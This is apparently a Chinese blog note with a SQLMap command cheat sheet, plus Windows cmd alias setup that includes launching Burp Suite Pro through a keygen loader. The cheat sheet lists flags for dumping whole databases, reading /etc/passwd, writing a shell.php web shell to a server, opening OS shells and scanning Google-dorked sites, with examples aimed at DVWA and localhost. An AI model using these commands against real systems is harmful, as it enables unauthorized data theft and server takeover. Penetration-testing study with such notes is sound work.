Abstract: SQLMap 的简单应用

Table of Contents

  1. Window 中的 cmd 中设置别名
    1. 设置 cmd 中常用命令的别名
  2. SQLMap 的应用
    1. 操作系统命令

Window 中的 cmd 中设置别名

设置 cmd 中常用命令的别名

  1. 新建 .bat 文件, cmd 输入 regedit

  1. 在 \HKEY_CURRENT_USER\Software\Microsoft\ 中新建项,命名为 Command Processor,再在其中新建字符串值,命名为 AutoRun,数据写为 .bat 的路径。

  2. 按照如下格式编辑 .bat 文件

1
2
3
4
5
@echo off
doskey sqlmap=D:\Software\Python27\python.exe D:\tools\PyScript\sqlmap\sqlmap.py $*
doskey clear=cls
doskey burp=java -Xbootclasspath/p:D:\Software\burpsuite\burp-loader-keygen.jar -jar D:\Software\burpsuite\burpsuite_pro_v2.0beta.jar
doskey behinder=javaw -jar D:\tools\software\Behinder\Behinder.jar

然后就可以直接在 cmd 中启动软件了。

behinder 软件还是无法启动,目前没有找到解决方法。

参考文章

cmd中设置别名

SQLMap 的应用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
--current-user                     #操作系统用户
--current-db                       #当前库名
--dbs                              #所有库名
--users                            #数据库管理员
--privileges -U                    #查管理员权限
--roles                            #查数据库角色
-D dvwa --tables                   #查库dvwa中所有的表
-D dvwa -T users --columns         #查表users中所有的列
--schema --batch --exclude-sysdbs  #查information_schema中表结构
--batch                            #表示过程中都选择默认选项    
--exclude-sysdbs                   #表示忽略系统表,只查有价值表
--count                            #对表计数

Dump 脱裤,慎用!
--dump, -C, -T, -D, --start, --stop #(部分脱裤)
--dump-all --exclude-sysdbs         #(直接脱裤)
--sql-query "select * from users"   #(自己命令脱离库)
# 当数据库管理员比较安全,没法顺利脱裤,只能利用字典拆解表名列名
--common-tables     --common-columns

Note: Mysql < 5.0,没有 information_schema 库,Mysql >= 5.0,但无权读取 information_schema 库,微软的 access 数据库,默认无权读取 MSysObjects库。

操作系统命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
--file-read = "/etc/passwd"
--file-write="shell.php" --file-dest "/tmp/shell.php"

--sql-shell    # Mysql
--os-shell
--os-cmd

sqlmap -m list.txt  # 批量扫描
# 调用google api 来扫描,国内需要设置代理链:
sqlmap.py -g "inurl:".php?id=1"" --proxy="http://127.0.0.1:8087"

# 利用proxy截断http请求并保存为 request.txt (推荐)
sqlmap -r request.txt
# 利用burpsite中的option设置,勾选保存proxy的request请求日志,保存为log.txt
sqlmap -l log.txt
1
2
3
4
5
6
7
8
9
10
11
12
--data					# 数据段
# web应用需要基于cookie身份认证
# 检查cookie中注入点
sqlmap -u "http://127.0.0.1/index.php" --data="user=1&pass=2";

--cookie				# cookie字段
sqlmap -u "http://127.0.0.1/index.php" --cookie="user=1&pass=2";

--user-agent    		# 手动指定
--host					# Host头
--referer               # Referer头
--method				# 扫描时指定方法 POST/GET